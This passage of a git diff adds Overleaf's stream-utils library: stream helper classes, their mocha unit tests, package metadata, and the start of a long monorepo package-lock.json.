Buffer.concat(this._buffers) + } + + contents() { + return Buffer.concat(this._buffers) + } +} + +/** + * A readable stream created from a string. + * @extends Readable + * @example + * const { ReadableString } = require('@overleaf/stream-utils') + * const stringStream = new ReadableString('hello world') + * stringStream.on('data', chunk => console.log(chunk.toString())) + * stringStream.on('end', () => console.log('done')) + */ +class ReadableString extends Readable { + constructor(string, options) { + super(options) + this._string = string + } + + _read(size) { + this.push(this._string) + this.push(null) + } +} + +class SizeExceededError extends Error {} + +/** + * Limited size stream which will emit a SizeExceededError if the size is exceeded + * @extends Transform + */ +class LimitedStream extends Transform { + constructor(maxSize) { + super() + this.maxSize = maxSize + this.size = 0 + } + + _transform(chunk, encoding, callback) { + this.size += chunk.byteLength + if (this.size > this.maxSize) { + callback( + new SizeExceededError( + `exceeded stream size limit of ${this.maxSize}: ${this.size}` + ) + ) + } else { + callback(null, chunk) + } + } +} + +class AbortError extends Error {} + +/** + * TimeoutStream which will emit an AbortError if it exceeds a user specified timeout + * @extends PassThrough + */ +class TimeoutStream extends PassThrough { + constructor(timeout) { + super() + this.t = setTimeout(() => { + this.destroy(new AbortError('stream timed out')) + }, timeout) + } + + _final(callback) { + clearTimeout(this.t) + callback() + } +} + +/** + * LoggerStream which will call the provided logger function when the stream exceeds a user specified limit. It will call the provided function again when flushing the stream and it exceeded the user specified limit before. + * @extends Transform + */ +class LoggerStream extends Transform { + /** + * Constructor. + * @param {number} maxSize + * @param {function(currentSizeOfStream: number, isFlush: boolean)} fn + * @param {Object?} options optional options for the Transform stream + */ + constructor(maxSize, fn, options) { + super(options) + this.fn = fn + this.size = 0 + this.maxSize = maxSize + this.logged = false + } + + _transform(chunk, encoding, callback) { + this.size += chunk.byteLength + if (this.size > this.maxSize && !this.logged) { + this.fn(this.size) + this.logged = true + } + callback(null, chunk) + } + + _flush(callback) { + if (this.size > this.maxSize) { + this.fn(this.size, true) + } + callback() + } +} + +// Export our classes + +module.exports = { + WritableBuffer, + ReadableString, + LoggerStream, + LimitedStream, + TimeoutStream, + SizeExceededError, + AbortError, +} diff --git a/libraries/stream-utils/package.json b/libraries/stream-utils/package.json new file mode 100644 index 0000000..686084a --- /dev/null +++ b/libraries/stream-utils/package.json @@ -0,0 +1,24 @@ +{ + "name": "@overleaf/stream-utils", + "version": "0.1.0", + "description": "stream handling utilities", + "main": "index.js", + "scripts": { + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test:ci": "npm run test:unit", + "types:check": "tsc --noEmit" + }, + "author": "Overleaf (https://www.overleaf.com)", + "license": "AGPL-3.0-only", + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } +} diff --git a/libraries/stream-utils/test/unit/LimitedStreamTests.js b/libraries/stream-utils/test/unit/LimitedStreamTests.js new file mode 100644 index 0000000..6401b7d --- /dev/null +++ b/libraries/stream-utils/test/unit/LimitedStreamTests.js @@ -0,0 +1,30 @@ +const { expect } = require('chai') +const { LimitedStream, SizeExceededError } = require('../../index') + +describe('LimitedStream', function () { + it('should emit an error if the stream size exceeds the limit', function (done) { + const maxSize = 10 + const limitedStream = new LimitedStream(maxSize) + limitedStream.on('error', err => { + expect(err).to.be.an.instanceOf(SizeExceededError) + done() + }) + limitedStream.write(Buffer.alloc(maxSize + 1)) + }) + + it('should pass through data if the stream size does not exceed the limit', function (done) { + const maxSize = 15 + const limitedStream = new LimitedStream(maxSize) + let data = '' + limitedStream.on('data', chunk => { + data += chunk.toString() + }) + limitedStream.on('end', () => { + expect(data).to.equal('hello world') + done() + }) + limitedStream.write('hello') + limitedStream.write(' world') + limitedStream.end() + }) +}) diff --git a/libraries/stream-utils/test/unit/LoggerStreamTests.js b/libraries/stream-utils/test/unit/LoggerStreamTests.js new file mode 100644 index 0000000..ed664f8 --- /dev/null +++ b/libraries/stream-utils/test/unit/LoggerStreamTests.js @@ -0,0 +1,36 @@ +const { expect } = require('chai') +const { LoggerStream } = require('../../index') + +describe('LoggerStream', function () { + it('should log the size of the stream when it exceeds the limit', function (done) { + const maxSize = 10 + const loggedSizes = [] + const loggerStream = new LoggerStream(maxSize, (size, isFlush) => { + loggedSizes.push([size, isFlush]) + if (isFlush) { + expect(loggedSizes).to.deep.equal([ + [11, undefined], + [11, true], + ]) + done() + } + }) + loggerStream.write(Buffer.alloc(maxSize)) + loggerStream.write(Buffer.alloc(1)) + loggerStream.end() + }) + + it('should not log the size of the stream if it does not exceed the limit', function (done) { + const maxSize = 10 + const loggedSizes = [] + const loggerStream = new LoggerStream(maxSize, (size, isFlush) => { + loggedSizes.push(size) + }) + loggerStream.write(Buffer.alloc(maxSize)) + loggerStream.end() + loggerStream.on('finish', () => { + expect(loggedSizes).to.deep.equal([]) + done() + }) + }) +}) diff --git a/libraries/stream-utils/test/unit/ReadableStringTests.js b/libraries/stream-utils/test/unit/ReadableStringTests.js new file mode 100644 index 0000000..b08dbc6 --- /dev/null +++ b/libraries/stream-utils/test/unit/ReadableStringTests.js @@ -0,0 +1,16 @@ +const { expect } = require('chai') +const { ReadableString } = require('../../index') + +describe('ReadableString', function () { + it('should emit the string passed to it', function (done) { + const stringStream = new ReadableString('hello world') + let data = '' + stringStream.on('data', chunk => { + data += chunk.toString() + }) + stringStream.on('end', () => { + expect(data).to.equal('hello world') + done() + }) + }) +}) diff --git a/libraries/stream-utils/test/unit/TimeoutStreamTests.js b/libraries/stream-utils/test/unit/TimeoutStreamTests.js new file mode 100644 index 0000000..2b203c5 --- /dev/null +++ b/libraries/stream-utils/test/unit/TimeoutStreamTests.js @@ -0,0 +1,22 @@ +const { expect } = require('chai') +const { TimeoutStream, AbortError } = require('../../index') + +describe('TimeoutStream', function () { + it('should emit an error if the stream times out', function (done) { + const timeout = 10 + const timeoutStream = new TimeoutStream(timeout) + timeoutStream.on('error', err => { + expect(err).to.be.an.instanceOf(AbortError) + done() + }) + }) + + it('should not emit an error if the stream does not time out', function (done) { + const timeout = 100 + const timeoutStream = new TimeoutStream(timeout) + setTimeout(() => { + timeoutStream.end() + done() + }, 1) + }) +}) diff --git a/libraries/stream-utils/test/unit/WritableBufferTests.js b/libraries/stream-utils/test/unit/WritableBufferTests.js new file mode 100644 index 0000000..a9b16a8 --- /dev/null +++ b/libraries/stream-utils/test/unit/WritableBufferTests.js @@ -0,0 +1,20 @@ +const { expect } = require('chai') +const { WritableBuffer } = require('../../index') + +describe('WritableBuffer', function () { + it('should store all data written to it in a node Buffer', function () { + const bufferStream = new WritableBuffer() + bufferStream.write('hello') + bufferStream.write('world') + bufferStream.end() + expect(bufferStream.contents().toString()).to.equal('helloworld') + }) + + it('should return the size of the data written to it', function () { + const bufferStream = new WritableBuffer() + bufferStream.write('hello') + bufferStream.write('world') + bufferStream.end() + expect(bufferStream.size()).to.equal(10) + }) +}) diff --git a/libraries/stream-utils/tsconfig.json b/libraries/stream-utils/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/stream-utils/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/package-lock.json b/package-lock.json new file mode 100644 index 0000000..e1e4750 --- /dev/null +++ b/package-lock.json @@ -0,0 +1,45920 @@ +{ + "name": "overleaf", + "lockfileVersion": 3, + "requires": true, + "packages": { + "": { + "name": "overleaf", + "hasInstallScript": true, + "workspaces": [ + "jobs/mirror-documentation", + "libraries/*", + "services/analytics", + "services/chat", + "services/clsi", + "services/clsi-cache", + "services/clsi-perf", + "services/contacts", + "services/docstore", + "services/document-updater", + "services/filestore", + "services/freegeoip", + "services/github-sync", + "services/history-v1", + "services/idp", + "services/latexqc", + "services/notifications", + "services/project-history", + "services/real-time", + "services/references", + "services/templates", + "services/third-party-datastore", + "services/third-party-references", + "services/tpdsworker", + "services/web", + "tools/saas-e2e" + ], + "dependencies": { + "patch-package": "^8.0.0" + }, + "devDependencies": { + "@types/chai": "^4.3.0", + "@types/chai-as-promised": "^7.1.8", + "@types/mocha": "^10.0.6", + "@typescript-eslint/eslint-plugin": "^8.0.0", + "@typescript-eslint/parser": "^8.0.0", + "eslint": "^8.15.0", + "eslint-config-prettier": "^8.5.0", + "eslint-config-standard": "^17.0.0", + "eslint-plugin-chai-expect": "^3.0.0", + "eslint-plugin-chai-friendly": "^0.7.2", + "eslint-plugin-cypress": "^2.15.1", + "eslint-plugin-import": "^2.26.0", + "eslint-plugin-mocha": "^10.1.0", + "eslint-plugin-node": "^11.1.0", + "eslint-plugin-prettier": "^4.0.0", + "eslint-plugin-promise": "^6.0.0", + "eslint-plugin-unicorn": "^56.0.0", + "prettier": "3.3.3", + "typescript": "^5.5.4" + } + }, + "jobs/mirror-documentation": { + "name": "mirror_documentation", + "version": "1.0.0", + "license": "ISC", + "dependencies": { + "bluebird": "^3.5.3", + "glob": "^7.1.3", + "googleapis": "^118.0.0", + "node-fetch": "^2.7.0", + "overleaf-editor-core": "*", + "swagger-client": "^3.8.24", + "tmp": "0.0.33" + } + }, + "jobs/mirror-documentation/node_modules/tmp": { + "version": "0.0.33", + "resolved": "https://registry.npmjs.org/tmp/-/tmp-0.0.33.tgz", + "integrity": "sha512-jRCJlojKnZ3addtTOjdIqoRuPEKBvNXcGYqzO6zWZX8KfKEpnGY5jfggJQ3EjKuu8D4bJRr0y+cYJFmYbImXGw==", + "dependencies": { + "os-tmpdir": "~1.0.2" + }, + "engines": { + "node": ">=0.6.0" + } + }, + "libraries/access-token-encryptor": { + "name": "@overleaf/access-token-encryptor", + "version": "3.0.0", + "license": "AGPL-3.0-only", + "dependencies": { + "lodash": "^4.17.21" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "typescript": "^5.0.4" + } + }, + "libraries/eslint-plugin": { + "name": "@overleaf/eslint-plugin", + "version": "0.1.0", + "license": "AGPL-3.0-only", + "dependencies": { + "eslint": "^8.51.0", + "lodash": "^4.17.21" + }, + "devDependencies": { + "@typescript-eslint/parser": "^6.7.5" + } + }, + "libraries/eslint-plugin/node_modules/@typescript-eslint/parser": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/parser/-/parser-6.21.0.tgz", + "integrity": "sha512-tbsV1jPne5CkFQCgPBcDOt30ItF7aJoZL997JSF7MhGQqOeT3svWRYxiqlfA5RUdlHN6Fi+EI9bxqbdyAUZjYQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/scope-manager": "6.21.0", + "@typescript-eslint/types": "6.21.0", + "@typescript-eslint/typescript-estree": "6.21.0", + "@typescript-eslint/visitor-keys": "6.21.0", + "debug": "^4.3.4" + }, + "engines": { + "node": "^16.0.0 || >=18.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "^7.0.0 || ^8.0.0" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "libraries/eslint-plugin/node_modules/debug": { + "version": "4.3.6", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.6.tgz", + "integrity": "sha512-O/09Bd4Z1fBrU4VzkhFqVgpPzaGbw6Sm9FEkBT1A/YBXQFGuuSxa1dN2nxgxS34JmKXqYx8CZAwEVoJFImUXIg==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "libraries/eslint-plugin/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "libraries/fetch-utils": { + "name": "@overleaf/fetch-utils", + "version": "0.1.0", + "license": "AGPL-3.0-only", + "dependencies": { + "@overleaf/o-error": "*", + "lodash": "^4.17.21", + "node-fetch": "^2.7.0", + "selfsigned": "^2.4.1" + }, + "devDependencies": { + "@types/node-fetch": "^2.6.11", + "body-parser": "^1.20.3", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "express": "^4.21.2", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "libraries/logger": { + "name": "@overleaf/logger", + "version": "3.1.1", + "license": "AGPL-3.0-only", + "dependencies": { + "@google-cloud/logging-bunyan": "^5.1.0", + "@overleaf/fetch-utils": "*", + "@overleaf/o-error": "*", + "bunyan": "^1.8.14" + }, + "devDependencies": { + "chai": "^4.3.6", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + }, + "peerDependencies": { + "@overleaf/metrics": "*" + } + }, + "libraries/metrics": { + "name": "@overleaf/metrics", + "version": "4.2.0", + "dependencies": { + "@google-cloud/opentelemetry-cloud-trace-exporter": "^2.1.0", + "@google-cloud/profiler": "^6.0.0", + "@opentelemetry/api": "^1.4.1", + "@opentelemetry/auto-instrumentations-node": "^0.39.1", + "@opentelemetry/exporter-trace-otlp-http": "^0.41.2", + "@opentelemetry/resources": "^1.15.2", + "@opentelemetry/sdk-node": "^0.41.2", + "@opentelemetry/semantic-conventions": "^1.15.2", + "compression": "^1.7.4", + "prom-client": "^14.1.1", + "yn": "^3.1.1" + }, + "devDependencies": { + "bunyan": "^1.0.0", + "chai": "^4.3.6", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + }, + "peerDependencies": { + "@overleaf/logger": "*" + } + }, + "libraries/metrics/node_modules/yn": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/yn/-/yn-3.1.1.tgz", + "integrity": "sha512-Ux4ygGWsu2c7isFWe8Yu1YluJmqVhxqK2cLXNQA5AcC3QfbGNpM7fu0Y8b/z16pXLnFxZYvWhd3fhBY9DLmC6Q==", + "engines": { + "node": ">=6" + } + }, + "libraries/mongo-utils": { + "name": "@overleaf/mongo-utils", + "version": "0.0.1", + "license": "AGPL-3.0-only", + "dependencies": { + "mongodb": "6.12.0", + "mongodb-legacy": "6.1.3" + }, + "devDependencies": { + "chai": "^4.3.6", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } + }, + "libraries/o-error": { + "name": "@overleaf/o-error", + "version": "3.4.0", + "license": "MIT", + "devDependencies": { + "@types/chai": "^4.3.0", + "@types/node": "^18.17.4", + "chai": "^4.3.6", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "libraries/object-persistor": { + "name": "@overleaf/object-persistor", + "version": "1.0.2", + "license": "AGPL-3.0", + "dependencies": { + "@google-cloud/storage": "^6.10.1", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/stream-utils": "*", + "aws-sdk": "^2.1691.0", + "fast-crc32c": "overleaf/node-fast-crc32c#aae6b2a4c7a7a159395df9cc6c38dfde702d6f51", + "glob": "^7.1.6", + "range-parser": "^1.2.1", + "tiny-async-pool": "^1.1.0" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "mock-fs": "^5.2.0", + "mongodb": "6.12.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } + }, + "libraries/object-persistor/node_modules/aws-sdk": { + "version": "2.1691.0", + "resolved": "https://registry.npmjs.org/aws-sdk/-/aws-sdk-2.1691.0.tgz", + "integrity": "sha512-/F2YC+DlsY3UBM2Bdnh5RLHOPNibS/+IcjUuhP8XuctyrN+MlL+fWDAiela32LTDk7hMy4rx8MTgvbJ+0blO5g==", + "hasInstallScript": true, + "dependencies": { + "buffer": "4.9.2", + "events": "1.1.1", + "ieee754": "1.1.13", + "jmespath": "0.16.0", + "querystring": "0.2.0", + "sax": "1.2.1", + "url": "0.10.3", + "util": "^0.12.4", + "uuid": "8.0.0", + "xml2js": "0.6.2" + }, + "engines": { + "node": ">= 10.0.0" + } + }, + "libraries/object-persistor/node_modules/uuid": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.0.0.tgz", + "integrity": "sha512-jOXGuXZAWdsTH7eZLtyXMqUb9EcWMGZNbL9YcGBJl4MH4nrxHmZJhEHvyLFrkxo+28uLb/NYRcStH48fnD0Vzw==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "libraries/overleaf-editor-core": { + "version": "1.0.0", + "license": "Proprietary", + "dependencies": { + "@overleaf/o-error": "*", + "check-types": "^5.1.0", + "lodash": "^4.17.19", + "p-map": "^4.0.0", + "path-browserify": "^1.0.1" + }, + "devDependencies": { + "@types/check-types": "^7.3.7", + "@types/path-browserify": "^1.0.2", + "chai": "^3.3.0", + "mocha": "^11.1.0", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + } + }, + "libraries/overleaf-editor-core/node_modules/chai": { + "version": "3.5.0", + "resolved": "https://registry.npmjs.org/chai/-/chai-3.5.0.tgz", + "integrity": "sha1-TQJjewZ/6Vi9v906QOxW/vc3Mkc=", + "dev": true, + "dependencies": { + "assertion-error": "^1.0.1", + "deep-eql": "^0.1.3", + "type-detect": "^1.0.0" + }, + "engines": { + "node": ">= 0.4.0" + } + }, + "libraries/overleaf-editor-core/node_modules/deep-eql": { + "version": "0.1.3", + "resolved": "https://registry.npmjs.org/deep-eql/-/deep-eql-0.1.3.tgz", + "integrity": "sha1-71WKyrjeJSBs1xOQbXTlaTDrafI=", + "dev": true, + "dependencies": { + "type-detect": "0.1.1" + }, + "engines": { + "node": "*" + } + }, + "libraries/overleaf-editor-core/node_modules/deep-eql/node_modules/type-detect": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-0.1.1.tgz", + "integrity": "sha1-C6XsKohWQORw6k6FBZcZANrFiCI=", + "dev": true, + "engines": { + "node": "*" + } + }, + "libraries/overleaf-editor-core/node_modules/type-detect": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-1.0.0.tgz", + "integrity": "sha1-diIXzAbbJY7EiQihKY6LlRIejqI=", + "dev": true, + "engines": { + "node": "*" + } + }, + "libraries/piece-table": { + "name": "@overleaf/piece-table", + "version": "1.0.0", + "license": "Proprietary", + "devDependencies": { + "chai": "^4.3.6", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "libraries/promise-utils": { + "name": "@overleaf/promise-utils", + "version": "0.1.0", + "license": "AGPL-3.0-only", + "dependencies": { + "p-limit": "^2.3.0" + }, + "devDependencies": { + "chai": "^4.3.10", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "libraries/promise-utils/node_modules/chai": { + "version": "4.3.10", + "resolved": "https://registry.npmjs.org/chai/-/chai-4.3.10.tgz", + "integrity": "sha512-0UXG04VuVbruMUYbJ6JctvH0YnC/4q3/AkT18q4NaITo91CUm0liMS9VqzT9vZhVQ/1eqPanMWjBM+Juhfb/9g==", + "dev": true, + "dependencies": { + "assertion-error": "^1.1.0", + "check-error": "^1.0.3", + "deep-eql": "^4.1.3", + "get-func-name": "^2.0.2", + "loupe": "^2.3.6", + "pathval": "^1.1.1", + "type-detect": "^4.0.8" + }, + "engines": { + "node": ">=4" + } + }, + "libraries/promise-utils/node_modules/deep-eql": { + "version": "4.1.3", + "resolved": "https://registry.npmjs.org/deep-eql/-/deep-eql-4.1.3.tgz", + "integrity": "sha512-WaEtAOpRA1MQ0eohqZjpGD8zdI0Ovsm8mmFhaDN8dvDZzyoUMcYDnf5Y6iu7HTXxf8JDS23qWa4a+hKCDyOPzw==", + "dev": true, + "dependencies": { + "type-detect": "^4.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "libraries/promise-utils/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "libraries/ranges-tracker": { + "name": "@overleaf/ranges-tracker", + "devDependencies": { + "chai": "^4.3.6", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "libraries/redis-wrapper": { + "name": "@overleaf/redis-wrapper", + "version": "2.1.0", + "license": "ISC", + "dependencies": { + "async": "^3.2.5", + "ioredis": "~4.27.1" + }, + "devDependencies": { + "@overleaf/logger": "*", + "@overleaf/o-error": "*", + "chai": "^4.3.6", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + }, + "peerDependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*" + } + }, + "libraries/settings": { + "name": "@overleaf/settings", + "version": "3.0.0", + "devDependencies": { + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "libraries/stream-utils": { + "name": "@overleaf/stream-utils", + "version": "0.1.0", + "license": "AGPL-3.0-only", + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "node_modules/@aashutoshrathi/word-wrap": { + "version": "1.2.6", + "resolved": "https://registry.npmjs.org/@aashutoshrathi/word-wrap/-/word-wrap-1.2.6.tgz", + "integrity": "sha512-1Yjs2SvM8TflER/OD3cOjhWWOZb58A2t7wpE2S9XfBYTiIl+XFhQG2bjy4Pu1I+EAlCNUzRDYDdFwFYUKvXcIA==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/@adobe/css-tools": { + "version": "4.4.2", + "resolved": "https://registry.npmjs.org/@adobe/css-tools/-/css-tools-4.4.2.tgz", + "integrity": "sha512-baYZExFpsdkBNuvGKTKWCwKH57HRZLVtycZS05WTQNVOiXVSeAki3nU35zlRbToeMW8aHlJfyS+1C4BOv27q0A==", + "dev": true, + "license": "MIT" + }, + "node_modules/@ampproject/remapping": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", + "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", + "dev": true, + "dependencies": { + "@jridgewell/gen-mapping": "^0.3.0", + "@jridgewell/trace-mapping": "^0.3.9" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@apidevtools/json-schema-ref-parser": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/@apidevtools/json-schema-ref-parser/-/json-schema-ref-parser-9.1.0.tgz", + "integrity": "sha512-teB30tFooE3iQs2HQIKJ02D8UZA1Xy1zaczzhUjJs0CymYxeC0g+y5rCY2p8NHBM6DBUVoR8rSM4kHLj1WE9mQ==", + "dependencies": { + "@jsdevtools/ono": "^7.1.3", + "@types/json-schema": "^7.0.6", + "call-me-maybe": "^1.0.1", + "js-yaml": "^4.1.0" + } + }, + "node_modules/@arrows/array": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/@arrows/array/-/array-1.4.1.tgz", + "integrity": "sha512-MGYS8xi3c4tTy1ivhrVntFvufoNzje0PchjEz6G/SsWRgUKxL4tKwS6iPdO8vsaJYldagAeWMd5KRD0aX3Q39g==", + "dev": true, + "dependencies": { + "@arrows/composition": "^1.2.2" + } + }, + "node_modules/@arrows/composition": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/@arrows/composition/-/composition-1.2.2.tgz", + "integrity": "sha512-9fh1yHwrx32lundiB3SlZ/VwuStPB4QakPsSLrGJFH6rCXvdrd060ivAZ7/2vlqPnEjBkPRRXOcG1YOu19p2GQ==", + "dev": true + }, + "node_modules/@arrows/dispatch": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/@arrows/dispatch/-/dispatch-1.0.3.tgz", + "integrity": "sha512-v/HwvrFonitYZM2PmBlAlCqVqxrkIIoiEuy5bQgn0BdfvlL0ooSBzcPzTMrtzY8eYktPyYcHg8fLbSgyybXEqw==", + "dev": true, + "dependencies": { + "@arrows/composition": "^1.2.2" + } + }, + "node_modules/@arrows/error": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@arrows/error/-/error-1.0.2.tgz", + "integrity": "sha512-yvkiv1ay4Z3+Z6oQsUkedsQm5aFdyPpkBUQs8vejazU/RmANABx6bMMcBPPHI4aW43VPQmXFfBzr/4FExwWTEA==", + "dev": true + }, + "node_modules/@arrows/multimethod": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/@arrows/multimethod/-/multimethod-1.4.1.tgz", + "integrity": "sha512-AZnAay0dgPnCJxn3We5uKiB88VL+1ZIF2SjZohLj6vqY2UyvB/sKdDnFP+LZNVsTC5lcnGPmLlRRkAh4sXkXsQ==", + "dev": true, + "dependencies": { + "@arrows/array": "^1.4.1", + "@arrows/composition": "^1.2.2", + "@arrows/error": "^1.0.2", + "fast-deep-equal": "^3.1.3" + } + }, + "node_modules/@auth0/thumbprint": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/@auth0/thumbprint/-/thumbprint-0.0.6.tgz", + "integrity": "sha1-yrEGLGwEZizmxZLUgVfsQmiuhRg=" + }, + "node_modules/@auth0/xmldom": { + "version": "0.1.21", + "resolved": "https://registry.npmjs.org/@auth0/xmldom/-/xmldom-0.1.21.tgz", + "integrity": "sha512-//QqjkvBknF7j0Nf205o5wgUMnq8ioHHxEr61OZQ3J0RXGFvs2rb5GLZ8jdNxMqYz4n/PEsbFIQL5RHBixxq5g==", + "engines": { + "node": ">=0.1" + } + }, + "node_modules/@aws-crypto/crc32": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@aws-crypto/crc32/-/crc32-3.0.0.tgz", + "integrity": "sha512-IzSgsrxUcsrejQbPVilIKy16kAT52EwB6zSaI+M3xxIhKh5+aldEyvI+z6erM7TCLB2BJsFrtHjp6/4/sr+3dA==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-crypto/util": "^3.0.0", + "@aws-sdk/types": "^3.222.0", + "tslib": "^1.11.1" + } + }, + "node_modules/@aws-crypto/crc32/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "optional": true, + "peer": true + }, + "node_modules/@aws-crypto/ie11-detection": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@aws-crypto/ie11-detection/-/ie11-detection-3.0.0.tgz", + "integrity": "sha512-341lBBkiY1DfDNKai/wXM3aujNBkXR7tq1URPQDL9wi3AUbI80NR74uF1TXHMm7po1AcnFk8iu2S2IeU/+/A+Q==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^1.11.1" + } + }, + "node_modules/@aws-crypto/ie11-detection/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "optional": true, + "peer": true + }, + "node_modules/@aws-crypto/sha256-browser": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@aws-crypto/sha256-browser/-/sha256-browser-3.0.0.tgz", + "integrity": "sha512-8VLmW2B+gjFbU5uMeqtQM6Nj0/F1bro80xQXCW6CQBWgosFWXTx77aeOF5CAIAmbOK64SdMBJdNr6J41yP5mvQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-crypto/ie11-detection": "^3.0.0", + "@aws-crypto/sha256-js": "^3.0.0", + "@aws-crypto/supports-web-crypto": "^3.0.0", + "@aws-crypto/util": "^3.0.0", + "@aws-sdk/types": "^3.222.0", + "@aws-sdk/util-locate-window": "^3.0.0", + "@aws-sdk/util-utf8-browser": "^3.0.0", + "tslib": "^1.11.1" + } + }, + "node_modules/@aws-crypto/sha256-browser/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "optional": true, + "peer": true + }, + "node_modules/@aws-crypto/sha256-js": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@aws-crypto/sha256-js/-/sha256-js-3.0.0.tgz", + "integrity": "sha512-PnNN7os0+yd1XvXAy23CFOmTbMaDxgxXtTKHybrJ39Y8kGzBATgBFibWJKH6BhytLI/Zyszs87xCOBNyBig6vQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-crypto/util": 